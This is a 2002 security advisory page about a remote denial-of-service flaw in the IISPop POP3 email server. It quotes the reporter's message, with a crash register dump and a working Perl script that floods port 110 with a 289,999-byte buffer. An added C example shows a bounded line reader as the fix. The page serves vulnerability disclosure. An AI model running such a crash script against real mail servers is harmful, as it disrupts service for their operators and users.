SecurityTracker.com
Category:  Application (E-mail Server)  >  IISPop EMail Server
Vendors:  Curtis Specialty Computing
IISPop EMail Server Can Be Crashed By Remote Users
SecurityTracker Alert ID:  1005627
CVE Reference:  GENERIC-MAP-NOMATCH
Date:  Nov 14 2002
Impact:  Denial of service via network
Exploit Included:  Yes  
Version(s): Tested on versions 1.161 and 1.181
Description:  A denial of service vulnerability was reported in the IISPop EMail Server. A remote user can cause the server to crash. Securma Massine reported this flaw.

A remote user can send a long string (289999 bytes) to the POP3 mail server to cause the mail server to crash.

A demonstration exploit script is provided in the Source Message.

Impact:  A remote user can cause the POP3 mail service to crash.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.curtiscomp.com/
Cause:  Boundary error
Underlying OS:  Windows (2000)
Reported By:  securma massine <securma@caramail.com>
Message History:   None.
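
The boundary check this class of flaw calls for, as an added example (not IISPop code and not part of the original advisory): a POP3 command reader that caps each line at the 255 octets RFC 2449 allows and discards anything longer, even when the line arrives across many recv() chunks. The names pop3_reader and pop3_feed are hypothetical, and the input in main() is constructed.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical names; an illustration of a bounded POP3 line reader. */
#define POP3_MAX_LINE 255  /* RFC 2449: max command length, CRLF included */
enum pop3_status { POP3_NEED_MORE, POP3_LINE_READY, POP3_LINE_TOO_LONG };

struct pop3_reader {
    char   line[POP3_MAX_LINE + 1]; /* +1 for the NUL terminator */
    size_t len;                     /* bytes stored for the current line */
    int    overflow;                /* current line has exceeded the cap */
};

/* Consume bytes from buf up to and including the next LF; *used receives the
 * count consumed. Oversized lines are discarded, never copied past line[]. */
enum pop3_status pop3_feed(struct pop3_reader *r, const char *buf, size_t n, size_t *used)
{
    for (size_t i = 0; i < n; i++) {
        if (buf[i] == '\n') {
            int too_long = r->overflow;
            if (r->len > 0 && r->line[r->len - 1] == '\r')
                r->len--;                 /* strip the CR of CRLF */
            r->line[r->len] = '\0';
            r->len = 0;                   /* reset state for the next line */
            r->overflow = 0;
            *used = i + 1;
            return too_long ? POP3_LINE_TOO_LONG : POP3_LINE_READY;
        }
        if (r->overflow)
            continue;                     /* drop the rest of an oversized line */
        if (r->len == POP3_MAX_LINE - 1)
            r->overflow = 1;              /* cap hit: stop storing, wait for LF */
        else
            r->line[r->len++] = buf[i];
    }
    *used = n;
    return POP3_NEED_MORE;
}

int main(void)
{
    /* Constructed input: one 289999-byte line, then a valid command. */
    static char big[289999 + 1];
    struct pop3_reader r = {0};
    size_t used;
    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\n';
    printf("oversized line -> status %d\n", pop3_feed(&r, big, sizeof big, &used));
    printf("next line      -> status %d\n", pop3_feed(&r, "QUIT\r\n", 6, &used));
    return 0;
}
```

On POP3_LINE_TOO_LONG the caller would answer -ERR and may close the connection; the contents of line[] are only meaningful after POP3_LINE_READY.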


 Source Message Contents

Date:  Thu, 14 Nov 2002 12:15:05 GMT+1
From:  securma massine <securma@caramail.com>
Subject:  IISPop remote DOS vulnerability

 


Hi,

The IISPop EMail Server (http://www.curtiscomp.com/) was
designed for small networks. This is a POP3-only server,
designed to be paired with the SMTP server bundled in
Windows 2000/IIS 5.

I have found that IISPop is vulnerable to a DoS attack
caused by sending a large buffer (289999 bytes). This attack
gives the following state of the registers (tested on
v1.161 and 1.181):

Access violation - code c0000005 (first chance)
eax=00000041 ebx=00407d3d ecx=00000101 edx=000021ae esi=0040693d edi=00437181
eip=77e76941 esp=0112ffb0 ebp=0000026c iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000206
KERNEL32!GetCurrentThreadId+4:
77e76941 0000 add [eax],al ds:0023:00000041=??

(unhandled exception in IISPop.exe (KERNEL32.DLL)
0xc0000005 : access violation)

exploit:
#!/usr/bin/perl -w
# tool : iispdos.pl
# shutdown all version of IISPop
# greetz crack.fr , marocit ,christal
#

use IO::Socket;

$ARGC=@ARGV;
if ($ARGC !=1) {
	print "\n-->";
	print "\tUsage: perl iispdos.pl <host> \n";
	exit;
}

$remo = $ARGV[0];
$buffer = "A" x 289999;

print "\n-->";
print "\tconnection with $remo\n";
unless ($so = IO::Socket::INET->new (Proto => "TCP",
					 PeerAddr => $remo,
					 PeerPort => "110"))
{
	print "-->";
	print "\tConnection Failed...\n";
	exit;
}
print $so "$buffer\n";
close $so;

print "-->";
print "\tnow test if the distant host is down\n";
exit;



Copyright 2002, SecurityGlobal.net LLC